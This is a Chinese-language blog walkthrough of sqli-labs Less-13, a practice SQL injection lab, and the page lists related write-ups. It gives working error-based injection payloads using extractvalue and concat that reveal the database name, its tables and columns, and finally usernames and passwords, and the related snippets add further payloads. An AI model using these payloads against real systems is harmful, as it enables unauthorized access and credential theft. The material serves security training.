sqli-labs/Less-13

最新推荐文章于 2023-07-24 10:01:00 发布
最新推荐文章于 2023-07-24 10:01:00 发布
阅读量262 收藏
点赞数
文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71299382/article/details/127928142
版权

首先需要判断一下注入类型

输入如下

admin'

存在报错信息 所以可以进行报错注入 但是无论正确与否都不会存在回显所以不能使用联合注入这题我们就是用报错注入吧 然后从报错信息我们可以知道注入类型为单引号注入 而且带有一个括号

我们进行作证 输入如下

admin')#

显示登陆成功 我们的判断是正确的

接下来进行爆库操作

输入如下

admin') and extractvalue(1,concat(0x7e,database(),0x7e));#

回显如下

 接着进行报表操作

输入如下

admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e));#

回显如下

接着进行爆字段操作

输入如下

admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="users"),0x7e));#

 回显如下

最后进行爆用户名和密码操作

admin') and extractvalue(1,concat(0x7e,(select group_concat(username,password) from users),0x7e));#

 

好了 成功解题!!!嗨嗨 

axihaihai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs通关(十三)
qq_65950075的博客
05-03 525
报错原理:xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx‘没有任何的返回信息,只有报错信息,那我们就用报错注入,让返回的报错信息包含我们的想要的信息。0x7e是~的意思,用concat拼接我们的sql语句,不符合xml文档的格式,就会报错,参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方。作用:改变文档中符合条件的节点的值。
sql二次注入-sqli-labs第13
weixin_46784800的博客
11-04 917
获取数据操作 判断所查询数据库中包含的列数 采用post进行参数输入: uname=') order by 3 -- - &passwd=') -- - 通过对查询结果进行排序,发现无法对第三列进行排序,且报错Unknown column ‘3’ in ‘order clause’,则说明所查询数据库中共有两列数据。 判断输出数据与数据库的联系 输入语句 uname=') or 1=1 -- - &passwd=') -- - 可发现界面只有登录成功的提示,则说明该网站为盲注,则
[网络安全]sqli-labs Less-13 解题详析
等风来
07-24 2307
以上为[网络安全]sqli-labs Less-13 解题详析,后续将分享[网络安全]sqli-labs Less-14 解题详析我是秋说,我们下次见。
sqli - labs - 13 ~ 14
m0_62102000的博客
07-15 239
sqli - labs - 13 ~ 14
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三关,SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
sqlilabs less13~14
TA不懒,但还没有添加简介
07-01 263
sqlilabs less13
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs靶场Less-13
songling515010475的专栏
08-25 130
1、访问首页,/Less-13/index.php,这里的传参点是表单中的uname、passwd 探测六步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 分析:这里是单引号+括号闭合,但这里正确时并没有显示点,但在探测过程中会报SQL语名错误的内容,所以这里判断可以用报错注入。 2、尝试使用报错注入 admin') and updatexml(1,concat(0x7e,(select .
Sqlilabs Less-13
Light_inthe_eyes的博客
03-04 254
判断是单引号单括号字符型注入,并且成功注入时无回显,所以用报错注入: uname=admin')&passwd=&submit=Submit uname=admin')#&passwd=&submit=Submit 判断列数: uname=admin')+order+by+2#&passwd=&submit=Submit 爆库: uname=admin')+and+extractvalue(1,concat(0x7e,(select+database()
sqli-labs (less-13)
kukudeshuo的博客
03-09 871
sqli-labs (less-13) 进入13,输入用户名和密码登入,利用hackbar抓取POST请求,但是这里我们发现屏幕上这次没有数据回显了,这也说明我们这里不能再使用union注入了 输入 uname=admin'&passwd=admin&submit=Submit #页面回显错误信息 通过报错信息我们知道闭合方式为’),并且为字符型注入 因为这里没有数据回显,但是我们观察到有完整的错误信息,所以这里可以使用Boolean盲注报错注入攻击 Boolean盲注 查看当前数据库
sqli-labs ————less -13
Fly_鹏程万里
05-11 977
Less -13源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&g..
[SQLi-LABS] Less-13
Stan冲冲冲
05-12 141
可以用盲注和双注 ')or 1=1# ')union select count(*),concat((select database()),floor(rand()*2)) as a from information_schema.columns group by 2# //爆库 ')union select count(*),concat((select group_concat(table_name) from information_schema.tables where table_sche
sqli-lab(13)
weixin_30664615的博客
05-24 131
Double Injection- String- with twist(双注入 - 字符型 - 变形) 来进行我们的注入测试 直接闭合,用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句,前面的单引号加括号和sql中的括号单引号闭合,后边的也闭合了,看图片: 一切都是对的,为什么还是登录失败? 因为username那儿变成空的了,所以前面随便加上一个用...
sqli-labs:less-13
羽的博客
07-24 167
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; cha...
sqli-labs-master第13、14关。
m_ing
05-13 1143
前言:输入内容被放到双引号中,报错型注入,注释符不可用 第十三关: http://192.168.89.134/sqli-labs-master/Less-13/ 先输入:admin’) 我们还是分析一下: 我们接着用and来测试。 admin’) and 1=2# -admin’) union selec 1,2#联合查询 还是没有报错,那我们就用报错语句来测试吧,这次我使用extractvalue() 显示版本,数据库 admin’) and extractvalue(1,concat(0x7
2020.4.4 sqli-labs--第十三、十四关③
DSR446的博客
04-04 338
Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入) 方法一 通过报错可知 是通过’) 闭合的 发现没有登入成功返回信息 ,看来是要盲注了 万能密码: 账号admin’)# 密码:随便 方法二: 既然它返回错误信息了,说明有回显,可以报错注入。 数据库名 uname=admin') and e...
sqli-labs/Less-28
最新发布
01-09
1. 打开sqli-labs实验平台,并找到Less-28实验。 2. 在输入框中输入以下内容进行注入: ``` ' or 1=1)# ``` 这个注入语句的作用是闭合原始查询并使其返回所有结果。 3. 提交注入语句并查看结果。如果页面显示了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

axihaihai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值